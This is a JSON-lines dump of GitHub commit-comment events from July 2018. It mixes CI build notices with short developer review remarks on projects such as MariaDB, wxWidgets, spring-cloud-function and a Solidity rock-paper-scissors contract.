{"id":"8038707609","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29889691,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-30T16:06:20Z","updated_at":"2018-07-30T16:06:20Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 50](https://teamcity.otenv.com/viewLog.html?buildId=9031341&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 7 Build time: 00:00:22"}},"created_at":"2018-07-30T16:06:20Z"}
{"id":"8038708379","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29889695,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-30T16:06:27Z","updated_at":"2018-07-30T16:06:27Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 234](https://teamcity.otenv.com/viewLog.html?buildId=9031338&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 34 Build time: 00:00:56"}},"created_at":"2018-07-30T16:06:27Z"}
{"id":"8038708469","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29889697,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-30T16:06:28Z","updated_at":"2018-07-30T16:06:28Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 49](https://teamcity.otenv.com/viewLog.html?buildId=9031340&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 7 Build time: 00:00:34"}},"created_at":"2018-07-30T16:06:28Z"}
{"id":"8038708789","type":"CommitCommentEvent","actor":{"login":"oliverfoster"},"repo":{"name":"adaptlearning/adapt-contrib-slider"},"payload":{"comment":{"id":29889700,"position":4,"line":11,"path":"templates/slider.hbs","commit_id":"578ad47afc47315395a5632cba8abed9093ce5ed","created_at":"2018-07-30T16:06:31Z","updated_at":"2018-07-30T16:06:31Z","author_association":"MEMBER","body":"Yes, that was the intent."}},"created_at":"2018-07-30T16:06:31Z"}
{"id":"8038709542","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29889703,"position":null,"line":null,"path":null,"commit_id":"d4381606f49b9f8ff33d422c61413f0c70fa13d2","created_at":"2018-07-30T16:06:39Z","updated_at":"2018-07-30T16:06:39Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-100](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-100).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-100-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-30T16:06:39Z"}
{"id":"8038710497","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29889706,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-30T16:06:48Z","updated_at":"2018-07-30T16:06:48Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 235](https://teamcity.otenv.com/viewLog.html?buildId=9031339&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 34 Build time: 00:01:14"}},"created_at":"2018-07-30T16:06:48Z"}
{"id":"8038711032","type":"CommitCommentEvent","actor":{"login":"dsyer"},"repo":{"name":"dsyer/spring-cloud-function"},"payload":{"comment":{"id":29889709,"position":161,"line":161,"path":"spring-cloud-function-webflux/src/main/java/org/springframework/cloud/function/web/flux/RequestProcessor.java","commit_id":"42966fc8ed271b8503861ca6f53ece2d0678506b","created_at":"2018-07-30T16:06:53Z","updated_at":"2018-07-30T16:06:53Z","author_association":"OWNER","body":"I don't have a really strong opinion on the signature of the converter."}},"created_at":"2018-07-30T16:06:53Z"}
{"id":"8038712779","type":"CommitCommentEvent","actor":{"login":"loicpoulain"},"repo":{"name":"todortomov/documentation"},"payload":{"comment":{"id":29889718,"position":21,"line":92,"path":"consumer/dragonboard/dragonboard410c/guides/camera-module.md","commit_id":"ae46715a878c96f70dfa622cb4c3cbf173a5cec3","created_at":"2018-07-30T16:07:12Z","updated_at":"2018-07-30T16:07:12Z","author_association":"NONE","body":"You can run make from dt-update root directory"}},"created_at":"2018-07-30T16:07:12Z"}
{"id":"8038714323","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29889724,"position":131,"line":105,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T16:07:27Z","updated_at":"2018-07-30T16:07:27Z","author_association":"OWNER","body":"ok, will right some tests to prevent these sort of errors - this variable name is obviously wrong  "}},"created_at":"2018-07-30T16:07:27Z"}
{"id":"8038716653","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29889734,"position":45,"line":1531,"path":"storage/innobase/fil/fil0fil.cc","commit_id":"92bdc28b5c88c7ccabe250a7b607089a23ad66fd","created_at":"2018-07-30T16:07:51Z","updated_at":"2018-07-30T16:07:51Z","author_association":"CONTRIBUTOR","body":"Here we are testing both `crypt_data` and `srv_encrypt_tables`. I think that we should only test one of them.\r\n\r\nAlso, it seems to me that the condition for setting `encrypt_status = ENCRYPT_DECRYPT_MIX` is wrong. If it is necessary to set that status when creating an `.ibd` file, then it should be set whenever `!crypt_data` disagrees with `encrypt_status`.\r\n\r\nI would think that when the `encrypted=default` attribute has been set in `CREATE TABLE`, or no `encrypted` attribute has been specified, then we should not modify `encrypt_status` from `ALL_ENCRYPTED` or `ALL_DECRYPTED`, but instead adhere to the existing configuration when writing data pages to the new file. Maybe we could add a debug assertion for that case?"}},"created_at":"2018-07-30T16:07:51Z"}
{"id":"8038717566","type":"CommitCommentEvent","actor":{"login":"Gomer1800"},"repo":{"name":"so0p/gcc-motor-control"},"payload":{"comment":{"id":29889736,"position":null,"line":null,"path":null,"commit_id":"1106dfafcfdcedafbbe5cf2ef006fa184d9f73a6","created_at":"2018-07-30T16:07:59Z","updated_at":"2018-07-30T16:07:59Z","author_association":"COLLABORATOR","body":"Will do, that's exactly what I had in mind next. I'm currently trying to\ndevise a way to do that given all the global variables we use. I'll keep\nyou updated\n\nOn Sun, Jul 29, 2018 at 12:01 PM Charlson So <notifications@github.com>\nwrote:\n\n> Can you organize each function into seperate classes? Create a .h and .cpp\n> for each seperate function and put them into a libraries folder alongside\n> gcc-motor-control.ino.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/so0p/gcc-motor-control/commit/1106dfafcfdcedafbbe5cf2ef006fa184d9f73a6#commitcomment-29876337>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGkAQMl2RBKD_v6KPlCwVtxFQZEv7xTGks5uLgafgaJpZM4Vlh1W>\n> .\n>\n-- \n*Luis Gomez*\n"}},"created_at":"2018-07-30T16:07:59Z"}
{"id":"8038718602","type":"CommitCommentEvent","actor":{"login":"loicpoulain"},"repo":{"name":"todortomov/documentation"},"payload":{"comment":{"id":29889739,"position":22,"line":93,"path":"consumer/dragonboard/dragonboard410c/guides/camera-module.md","commit_id":"ae46715a878c96f70dfa622cb4c3cbf173a5cec3","created_at":"2018-07-30T16:08:09Z","updated_at":"2018-07-30T16:08:09Z","author_association":"NONE","body":"You can also run 'make install' to copy tools to usr/bin"}},"created_at":"2018-07-30T16:08:09Z"}
{"id":"8038718647","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29889740,"position":null,"line":null,"path":null,"commit_id":"7571a5c1f2ebfe4d7c39098a448ba7274ab3ca61","created_at":"2018-07-30T16:08:10Z","updated_at":"2018-07-30T16:08:10Z","author_association":"CONTRIBUTOR","body":"In this commit, you add server side attributes that are not used in Classic, thus won't Faerie Fire be broken by the removal of code replacing these attributes in Classic?"}},"created_at":"2018-07-30T16:08:10Z"}
{"id":"8038725716","type":"CommitCommentEvent","actor":{"login":"loicpoulain"},"repo":{"name":"todortomov/documentation"},"payload":{"comment":{"id":29889772,"position":null,"line":null,"path":null,"commit_id":"ae46715a878c96f70dfa622cb4c3cbf173a5cec3","created_at":"2018-07-30T16:09:17Z","updated_at":"2018-07-30T16:09:17Z","author_association":"NONE","body":"cf inline comments"}},"created_at":"2018-07-30T16:09:17Z"}
{"id":"8038725741","type":"CommitCommentEvent","actor":{"login":"manics"},"repo":{"name":"manics/kubespray"},"payload":{"comment":{"id":29889773,"position":3,"line":2,"path":"contrib/network-storage/heketi/heketi-tear-down.yml","commit_id":"5fdf1615708e17b606001b7b4cae1c3fb8ee5169","created_at":"2018-07-30T16:09:17Z","updated_at":"2018-07-30T16:09:17Z","author_association":"OWNER","body":"I split the tear-down role, so now it only handles the `kubectl` commands. `tear-down-disks` runs on the nodes and takes care of removing the logical volumes."}},"created_at":"2018-07-30T16:09:17Z"}
{"id":"8038727486","type":"CommitCommentEvent","actor":{"login":"Yasir-siddiqui"},"repo":{"name":"lzzy12/tgbot"},"payload":{"comment":{"id":29889783,"position":null,"line":null,"path":null,"commit_id":"61b526548080b03fe2ce5ed76912394411149470","created_at":"2018-07-30T16:09:35Z","updated_at":"2018-07-30T16:09:35Z","author_association":"NONE","body":"...\r\n"}},"created_at":"2018-07-30T16:09:35Z"}
{"id":"8038728905","type":"CommitCommentEvent","actor":{"login":"Generalcamo"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29889792,"position":51,"line":71,"path":"src/main/java/mods/railcraft/common/plugins/jei/RailcraftJEIPlugin.java","commit_id":"c30f172437779b64f1af439daf69827c0217050d","created_at":"2018-07-30T16:09:50Z","updated_at":"2018-07-30T16:09:50Z","author_association":"MEMBER","body":"You mean Bleached Bone Blocks. That has used a standard bone block since 10.2, deprecating the old clay"}},"created_at":"2018-07-30T16:09:50Z"}
{"id":"8038732727","type":"CommitCommentEvent","actor":{"login":"dsyer"},"repo":{"name":"dsyer/spring-cloud-function"},"payload":{"comment":{"id":29889808,"position":181,"line":181,"path":"spring-cloud-function-webflux/src/main/java/org/springframework/cloud/function/web/flux/RequestProcessor.java","commit_id":"42966fc8ed271b8503861ca6f53ece2d0678506b","created_at":"2018-07-30T16:10:31Z","updated_at":"2018-07-30T16:10:31Z","author_association":"OWNER","body":"When I make that change the tests are green, so I don't follow the point about the assertion."}},"created_at":"2018-07-30T16:10:31Z"}
{"id":"8038734061","type":"CommitCommentEvent","actor":{"login":"seldridge"},"repo":{"name":"freechipsproject/treadle"},"payload":{"comment":{"id":29889814,"position":1,"line":1,"path":"src/main/resources/META-INF/services/registration.spi.RegisteredLibrary","commit_id":"b929ee884ff48df619c1185b8ad9bed6df35d299","created_at":"2018-07-30T16:10:46Z","updated_at":"2018-07-30T16:10:46Z","author_association":"MEMBER","body":"I think the reason why the options parser isn't finding this is because of the file name. I think this has to be `firrtl.options.RegisteredLibrary`."}},"created_at":"2018-07-30T16:10:46Z"}
{"id":"8038741951","type":"CommitCommentEvent","actor":{"login":"dn1231"},"repo":{"name":"phone2action/testcafe-cucumber"},"payload":{"comment":{"id":29889840,"position":null,"line":null,"path":null,"commit_id":"4415b081282c796e134dd33cafa6d73df64fdf83","created_at":"2018-07-30T16:12:09Z","updated_at":"2018-07-30T16:12:09Z","author_association":"NONE","body":"looks good... Good job @joannawliu "}},"created_at":"2018-07-30T16:12:09Z"}
{"id":"8038743043","type":"CommitCommentEvent","actor":{"login":"Wolfkid200444"},"repo":{"name":"FutureDeveloperZ/WolfGangShopUI"},"payload":{"comment":{"id":29889844,"position":null,"line":null,"path":null,"commit_id":"5f0e47489090fb8a0b863d6e730b99b3d21bd354","created_at":"2018-07-30T16:12:19Z","updated_at":"2018-07-30T16:12:19Z","author_association":"CONTRIBUTOR","body":"👌"}},"created_at":"2018-07-30T16:12:19Z"}
{"id":"8038746802","type":"CommitCommentEvent","actor":{"login":"troop66matawan"},"repo":{"name":"troop66matawan/TroopmasterImporter"},"payload":{"comment":{"id":29889854,"position":null,"line":null,"path":null,"commit_id":"c62a05033ea7dbe35343c4ca42d84158d71cd962","created_at":"2018-07-30T16:13:00Z","updated_at":"2018-07-30T16:13:00Z","author_association":"OWNER","body":"fixes #10 "}},"created_at":"2018-07-30T16:13:00Z"}
{"id":"8038749405","type":"CommitCommentEvent","actor":{"login":"Yasir-siddiqui"},"repo":{"name":"lzzy12/tgbot"},"payload":{"comment":{"id":29889864,"position":null,"line":null,"path":null,"commit_id":"61b526548080b03fe2ce5ed76912394411149470","created_at":"2018-07-30T16:13:28Z","updated_at":"2018-07-30T16:13:28Z","author_association":"NONE","body":"...\r\n"}},"created_at":"2018-07-30T16:13:28Z"}
{"id":"8038749740","type":"CommitCommentEvent","actor":{"login":"domwashburn"},"repo":{"name":"semantic-release/semantic-release"},"payload":{"comment":{"id":29889865,"position":126,"line":126,"path":"index.js","commit_id":"b4440fe0d38ceb972bdda9ccb24aafb78e8b3cef","created_at":"2018-07-30T16:13:31Z","updated_at":"2018-07-30T16:13:31Z","author_association":"NONE","body":"Sounds good, just looking to help...\r\n\r\nKnowing that this is behind (and that there's still some work to be done), I'll keep a closer eye on this to make sure that I can keep as up-to-date as I can. For now I've forked this and added the edits I mentioned above so my team can use that to run our pre-release build.\r\n\r\nI appreciate all the work you're putting in, let me know if there's anything I can do to increase velocity."}},"created_at":"2018-07-30T16:13:31Z"}
{"id":"8038751309","type":"CommitCommentEvent","actor":{"login":"balta2ar"},"repo":{"name":"mg979/vim-visual-multi"},"payload":{"comment":{"id":29889870,"position":null,"line":null,"path":null,"commit_id":"d57e4a77c79d641746d6f5a441c5d342d23fc142","created_at":"2018-07-30T16:13:47Z","updated_at":"2018-07-30T16:13:47Z","author_association":"NONE","body":"Thank you, the error is gone!"}},"created_at":"2018-07-30T16:13:47Z"}
{"id":"8038751979","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29889871,"position":109,"line":93,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T16:13:53Z","updated_at":"2018-07-30T16:13:53Z","author_association":"OWNER","body":"1 - they can send a bad move that will never decrypted to a real move.  To fix it, I could make this method require an unencrypted move instead and only encrypt the creator's moves...\r\n2 - i don't protect against overflow for the `game.funds`\r\n\r\nalso, not a bug, but i could also make this method payable"}},"created_at":"2018-07-30T16:13:53Z"}
{"id":"8038753010","type":"CommitCommentEvent","actor":{"login":"dsyer"},"repo":{"name":"dsyer/spring-cloud-function"},"payload":{"comment":{"id":29889875,"position":264,"line":264,"path":"spring-cloud-function-webflux/src/main/java/org/springframework/cloud/function/web/flux/RequestProcessor.java","commit_id":"42966fc8ed271b8503861ca6f53ece2d0678506b","created_at":"2018-07-30T16:14:04Z","updated_at":"2018-07-30T16:14:04Z","author_association":"OWNER","body":"The test failures in this case are significant. We want to get back a single value if we POST a single value to a function that returns a single value. So I believe we should not make this change. It would be a behaviour change with 1.0 apart from anything else."}},"created_at":"2018-07-30T16:14:04Z"}
{"id":"8038753541","type":"CommitCommentEvent","actor":{"login":"mulyana233"},"repo":{"name":"yagidot/pantsupoi"},"payload":{"comment":{"id":29889879,"position":null,"line":null,"path":null,"commit_id":"629f96e34d21d425af67fa6f50b43b52a7d3693c","created_at":"2018-07-30T16:14:10Z","updated_at":"2018-07-30T16:14:10Z","author_association":"NONE","body":"tutornya donk om sesama orang indo plss"}},"created_at":"2018-07-30T16:14:10Z"}
{"id":"8038760261","type":"CommitCommentEvent","actor":{"login":"BardinPetr"},"repo":{"name":"BardinPetr/FINCERT-Sirius"},"payload":{"comment":{"id":29889906,"position":null,"line":null,"path":null,"commit_id":"1b6fdad8f483848dc95b9dcf2dac429eb3b8710e","created_at":"2018-07-30T16:15:20Z","updated_at":"2018-07-30T16:15:20Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Новый вариант коллбэков для логирования и не только](https://trello.com/c/GEmIbilB/77-%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9-%D0%B2%D0%B0%D1%80%D0%B8%D0%B0%D0%BD%D1%82-%D0%BA%D0%BE%D0%BB%D0%BB%D0%B1%D1%8D%D0%BA%D0%BE%D0%B2-%D0%B4%D0%BB%D1%8F-%D0%BB%D0%BE%D0%B3%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F-%D0%B8-%D0%BD%D0%B5-%D1%82%D0%BE%D0%BB%D1%8C%D0%BA%D0%BE)"}},"created_at":"2018-07-30T16:15:20Z"}
{"id":"8038760262","type":"CommitCommentEvent","actor":{"login":"BardinPetr"},"repo":{"name":"BardinPetr/FINCERT-Sirius"},"payload":{"comment":{"id":29889905,"position":null,"line":null,"path":null,"commit_id":"1b6fdad8f483848dc95b9dcf2dac429eb3b8710e","created_at":"2018-07-30T16:15:20Z","updated_at":"2018-07-30T16:15:20Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Новый вариант коллбэков для логирования и не только](https://trello.com/c/GEmIbilB/77-%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9-%D0%B2%D0%B0%D1%80%D0%B8%D0%B0%D0%BD%D1%82-%D0%BA%D0%BE%D0%BB%D0%BB%D0%B1%D1%8D%D0%BA%D0%BE%D0%B2-%D0%B4%D0%BB%D1%8F-%D0%BB%D0%BE%D0%B3%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F-%D0%B8-%D0%BD%D0%B5-%D1%82%D0%BE%D0%BB%D1%8C%D0%BA%D0%BE)"}},"created_at":"2018-07-30T16:15:20Z"}
{"id":"8038764670","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29889914,"position":9,"line":186,"path":"RockPaperScissors.sol","commit_id":"36f95ec70f2f9af96d6a6c6880a77935edf8d818","created_at":"2018-07-30T16:16:03Z","updated_at":"2018-07-30T16:16:03Z","author_association":"OWNER","body":"i didn't know that was a possibility, will investigate "}},"created_at":"2018-07-30T16:16:03Z"}
{"id":"8038768537","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/Products.statusmessages"},"payload":{"comment":{"id":29889927,"position":null,"line":null,"path":null,"commit_id":"92539f3f7901ffd075213dd8b41a8531250bcfa0","created_at":"2018-07-30T16:16:41Z","updated_at":"2018-07-30T16:16:41Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-Products.statusmessages/32/violations\n```\nProducts/statusmessages/tests/test_adapter.py:35:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:221:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_adapter.py:241:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:308:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_encoding.py:17:39: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-30T16:16:41Z"}
{"id":"8038770615","type":"CommitCommentEvent","actor":{"login":"bcanseco"},"repo":{"name":"bcanseco/style-loader"},"payload":{"comment":{"id":29889933,"position":null,"line":null,"path":null,"commit_id":"558665f552432e6a0ac5ed29c5a7d8a8039d16d0","created_at":"2018-07-30T16:17:04Z","updated_at":"2018-07-30T16:17:04Z","author_association":"OWNER","body":"```js\r\n{\r\n  loader: 'style-loader',\r\n  options: {\r\n    selector: `div[${componentName}]`, // custom field from our style-loader fork\r\n    insertInto: () => {\r\n      /* eslint-disable-next-line no-undef */\r\n      return document.querySelector(options.selector).shadowRoot;\r\n    },\r\n  },\r\n},\r\n```"}},"created_at":"2018-07-30T16:17:04Z"}
{"id":"8038775030","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29889947,"position":27,"line":32,"path":"contracts/Splitter.sol","commit_id":"c8ffbf73d32d0702543e9c6aa84c835c2778518c","created_at":"2018-07-30T16:17:51Z","updated_at":"2018-07-30T16:17:51Z","author_association":"OWNER","body":"i restructured my tests a bit and got it working. and no longer need ```isEvenNumber()``` - 7df4675"}},"created_at":"2018-07-30T16:17:51Z"}
{"id":"8038775863","type":"CommitCommentEvent","actor":{"login":"mirandali17"},"repo":{"name":"mirandali17/website"},"payload":{"comment":{"id":29889950,"position":1,"line":1,"path":"lipsum.txt","commit_id":"115fc31451726d6d4ea0f380f40230c0ff4a7482","created_at":"2018-07-30T16:18:00Z","updated_at":"2018-07-30T16:18:00Z","author_association":"OWNER","body":"### Lisum Really?\r\n\r\nSo we __really__ were not able to find better filler text?"}},"created_at":"2018-07-30T16:18:00Z"}
{"id":"8038777248","type":"CommitCommentEvent","actor":{"login":"dkulp"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29889954,"position":null,"line":null,"path":null,"commit_id":"24dbe9775c1901b24a514ead28923227922b30af","created_at":"2018-07-30T16:18:14Z","updated_at":"2018-07-30T16:18:14Z","author_association":"CONTRIBUTOR","body":"`\r\ndiff --git a/samples/image/canvas.cpp b/samples/image/canvas.cpp\r\nindex f809f2a724..8a1065d91a 100644\r\n--- a/samples/image/canvas.cpp\r\n+++ b/samples/image/canvas.cpp\r\n@@ -62,7 +62,7 @@ MyCanvas::MyCanvas( wxWindow *parent, wxWindowID id,\r\n\r\n     wxMemoryDC dc;\r\n     dc.SelectObject( bitmap );\r\n-    dc.SetBrush( wxBrush( wxS(\"orange\") ) );\r\n+    dc.SetBrush( wxBrush( wxS(\"red\") ) );\r\n     dc.SetPen( *wxBLACK_PEN );\r\n     dc.DrawRectangle( 0, 0, 100, 100 );\r\n     dc.SetBrush( *wxWHITE_BRUSH );\r\n@@ -79,7 +79,12 @@ MyCanvas::MyCanvas( wxWindow *parent, wxWindowID id,\r\n         wxLogWarning(wxT(\"Can't find image files in either '.' or '..'!\"));\r\n\r\n     wxImage image = bitmap.ConvertToImage();\r\n+    unsigned char* data = image.GetData();\r\n\r\n+\r\n+    printf(\"%X %X %X\\n\", data[303], data[304], data[305]);\r\n+\r\n+\r\n #if wxUSE_LIBPNG\r\n     if ( !image.SaveFile( dir + wxT(\"test.png\"), wxBITMAP_TYPE_PNG ))\r\n     {\r\n`"}},"created_at":"2018-07-30T16:18:14Z"}
{"id":"8038783441","type":"CommitCommentEvent","actor":{"login":"dkulp"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29889972,"position":null,"line":null,"path":null,"commit_id":"24dbe9775c1901b24a514ead28923227922b30af","created_at":"2018-07-30T16:19:22Z","updated_at":"2018-07-30T16:19:22Z","author_association":"CONTRIBUTOR","body":"With the old color space, that prints \"FF 0 0\", with the new \"FF 26 0\""}},"created_at":"2018-07-30T16:19:22Z"}
{"id":"8038792282","type":"CommitCommentEvent","actor":{"login":"mg979"},"repo":{"name":"mg979/vim-visual-multi"},"payload":{"comment":{"id":29889987,"position":null,"line":null,"path":null,"commit_id":"d57e4a77c79d641746d6f5a441c5d342d23fc142","created_at":"2018-07-30T16:20:55Z","updated_at":"2018-07-30T16:20:55Z","author_association":"OWNER","body":"Sorry for the issue. There have been lots of changes to mappings/compatibility management, recently. They were necessary and they should solve a lot of future issues, but I have to improve on the side of user-friendliness.\r\n\r\nCheck [here](https://github.com/mg979/vim-visual-multi/wiki#master-and-test-branches) and [here](https://github.com/mg979/vim-visual-multi/wiki/M.-Mappings#options-and-customization) if you find something works differently.\r\n"}},"created_at":"2018-07-30T16:20:55Z"}
{"id":"8038794716","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29889996,"position":null,"line":null,"path":null,"commit_id":"36f95ec70f2f9af96d6a6c6880a77935edf8d818","created_at":"2018-07-30T16:21:22Z","updated_at":"2018-07-30T16:21:22Z","author_association":"OWNER","body":"yeah, thats what i meant by my TODO stretch goal, but was poorly/miss- worded"}},"created_at":"2018-07-30T16:21:22Z"}
{"id":"8038795107","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29889997,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-30T16:21:26Z","updated_at":"2018-07-30T16:21:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T16:21:26Z"}
{"id":"8038798784","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"joshuasing/MoreWorlds"},"payload":{"comment":{"id":29890004,"position":null,"line":null,"path":null,"commit_id":"5ca1021af0a9f20412c809017fa006cf3fba6059","created_at":"2018-07-30T16:22:08Z","updated_at":"2018-07-30T16:22:08Z","author_association":"NONE","body":"> Dear @joshuasing:\n> I regret to inform you that the release you submitted, named \"**MoreWorlds**\" (v2.0.3), for the project [Worlds](https://poggit.pmmp.io/ci/joshuasing/MoreWorlds/Worlds) on 2018-07-27T08:11:37.000Z, has been rejected.\n\nThis plugin only makes very minor and specific changes to @survanetwork's Worlds plugin. Such minor edits cannot be submitted on Poggit Release.\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-30T16:22:08Z"}
{"id":"8038803324","type":"CommitCommentEvent","actor":{"login":"tens91"},"repo":{"name":"hulu/statsd-aggregator"},"payload":{"comment":{"id":29890012,"position":5,"line":4,"path":"usr/share/statsd-aggregator/statsd-aggregator.conf.sample","commit_id":"7c6eb84e18cfc59dafd08c5295143f4b89ac04d7","created_at":"2018-07-30T16:22:57Z","updated_at":"2018-07-30T16:22:57Z","author_association":"NONE","body":"Is it possible to make health checking optional and send over UDP instead of TCP?"}},"created_at":"2018-07-30T16:22:57Z"}
{"id":"8038805598","type":"CommitCommentEvent","actor":{"login":"a-mooz"},"repo":{"name":"pythian/skeletos"},"payload":{"comment":{"id":29890017,"position":null,"line":null,"path":null,"commit_id":"3c65ab4c324e51452d53c0a76ff7e7f1dc6cc788","created_at":"2018-07-30T16:23:21Z","updated_at":"2018-07-30T16:23:21Z","author_association":"NONE","body":"Sweet."}},"created_at":"2018-07-30T16:23:21Z"}
{"id":"8038840855","type":"CommitCommentEvent","actor":{"login":"olstenlarck"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29890123,"position":null,"line":null,"path":null,"commit_id":"efbb13dfd8db00a91c68895087241b0e4cefc26e","created_at":"2018-07-30T16:29:38Z","updated_at":"2018-07-30T16:29:38Z","author_association":"CONTRIBUTOR","body":":+1: :100: "}},"created_at":"2018-07-30T16:29:38Z"}
{"id":"8038844021","type":"CommitCommentEvent","actor":{"login":"adrian-bl"},"repo":{"name":"vanilla-music/vanilla"},"payload":{"comment":{"id":29890128,"position":null,"line":null,"path":null,"commit_id":"317641bc3027177e2a4f747f8277aa933d458565","created_at":"2018-07-30T16:30:14Z","updated_at":"2018-07-30T16:30:14Z","author_association":"MEMBER","body":"Thanks! I'll sync with transifex the next time i touch the code :)\r\n\r\n(I do this on a not-so-regular basis, but always before tagging a new release)"}},"created_at":"2018-07-30T16:30:14Z"}
{"id":"8038847861","type":"CommitCommentEvent","actor":{"login":"chipaca"},"repo":{"name":"snapcore/snapd"},"payload":{"comment":{"id":29890143,"position":61,"line":121,"path":"wrappers/core18.go","commit_id":"198e185a15d00a9517d49c07c8f381d0bc86fd24","created_at":"2018-07-30T16:30:54Z","updated_at":"2018-07-30T16:30:54Z","author_association":"MEMBER","body":"btw, `ReplaceAllString`"}},"created_at":"2018-07-30T16:30:54Z"}
